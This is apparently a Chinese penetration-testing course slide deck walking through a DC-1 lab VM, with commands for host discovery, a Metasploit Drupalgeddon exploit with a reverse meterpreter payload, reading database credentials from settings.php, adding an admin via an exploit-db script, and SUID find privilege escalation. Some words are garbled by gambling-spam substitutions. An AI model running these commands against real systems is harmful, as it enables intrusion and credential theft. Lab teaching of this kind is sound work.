渗透测试技术 课件 第8章 渗透测试综合实践.pptx

渗透测试技术 课件 第8章 渗透测试综合实践.pptx

  1. 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
DC-1靶机渗透测试实践 第8章为渗透测试综合实践,对综合的靶场环境进行黑盒渗透,获取服务器系统权限,需要结合前面课程所学习的内容包括信息收集、漏洞查找、漏洞利用、权限提升等,对综合渗透环境进行渗透测试实践,旨在帮助学者把前面所学习的知识进行融会贯通,学以致用。前言/PREFACE DC-1靶机渗透测试实践DC-1是一个专门构建的易受攻击的靶机,目标旨在通过渗透测试获取目标信息,拿到root权限。DC-1靶机的下载地址为:/dc/DC-1.zip 目录/CONTENTS01渗透目标信息收集02利用Metasploit进行漏洞探测03Drupal框架漏洞利用04权限提升 信息收集使用arp-scan探测存活主机输入命令:arp-scan -l对存活主机进行探测 信息收集使用Nmap探测开放端口在探测到存活主机后,进一步对存活主机进行渗透,那么就需要知道主机所提供的服务,此时需要对存活端口进行探测。 信息收集服务及版本探测80端口对应的服务为HTTP服务,查看网页相关信息可以看到该网站使用CMS为Drupal,在网页界面和底部都能发现“Drupal”标签信息。 目录/CONTENTS01渗透目标信息收集02利用Metasploit进行漏洞探测03Drupal框架漏洞利用04权限提升 漏洞探测通过Metasploit查找Drupal架构漏洞利用的脚本,在Kali终端中输入msfconsole,启动Metasploit,进一步有哪些信誉好的足球投注网站Drupal架构利用漏洞。 漏洞探测在Metasploit中输入Search Drupal,查找漏洞利用模块。在Matesploit中有哪些信誉好的足球投注网站到可利用模块后,对漏洞进行利用。例如,选择模块drupal_drupageddon 目录/CONTENTS01渗透目标信息收集02利用Metasploit进行漏洞探测03Drupal框架漏洞利用04权限提升 漏洞利用模块drupal_drupageddon具体命令如下:use exploit/multi/http/drupal_drupageddonset payload php/meterpreter/reverse_tcpset rhosts 46exploit 漏洞利用在利用成功后,Matesploit进入后渗透meterpreter模块,输入“shell”,获取普通shell。 漏洞利用Drupal框架的配置文件路径为sites/default/files。进入配置文件路径后,输入pwd查看当前所处目录,确认为Drupal默认配置文件目录。 漏洞利用Drupal框架的数据库账号密码可以在settings.php中查看到,输入“cat /var/www/sites/default/settings.php”,查看settings.php内容,获得了数据库账号和密码。 漏洞利用输入“whoami”查看当前获取shell权限为www-data。 漏洞利用建立一个更高权限的交互式shell来控制靶机输入命令:python -c import pty; pty.spawn(/bin/bash)来获取Python返回来的交互式shell,然后连接数据库。 漏洞利用接下来查看数据库,在drupaldb库中寻找用户表。最后在drupaldb库users表中发现admin用户,但是admin用户的密码是被加密过的。 漏洞利用查看Drupal版本,输入“cat /var/www/includes/bootstrap.inc | grep VERSION”, 确定Drupal版本为7.24。 漏洞利用输入“searchsploit drupal”查找drupal的利用代码。 漏洞利用利用脚本增加一组用户名密码admin1/ admin1,执行下述命令新增用户。命令如下:python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t 46/ -u admin1 -p admin1 漏洞利用成功添加用户后,即可使用admin1/ admin1登录Web页面。 目录/CONTENTS01渗透目标信息收集02利用Metasploit进行漏洞探测03Drupal框架漏洞利用04权限提升 权限提升查找系统中具有suid设置的所有文件,输入“find / -perm -4000 2/dev/null”进行查找。 权限提升通过find方式进行提权,依次输入下述命令:touch venusfind / -type f -name venus -exec whoami \;find / -type f -name venus -exec /bin/sh \;输入“whoami”查看权限是否提升成功。 总结通过XX学习??? 感 谢 观 看! Co

文档评论(0)

lai + 关注
实名认证
内容提供者

精品资料

版权声明书
用户编号:7040145050000060

1亿VIP精品文档

相关文档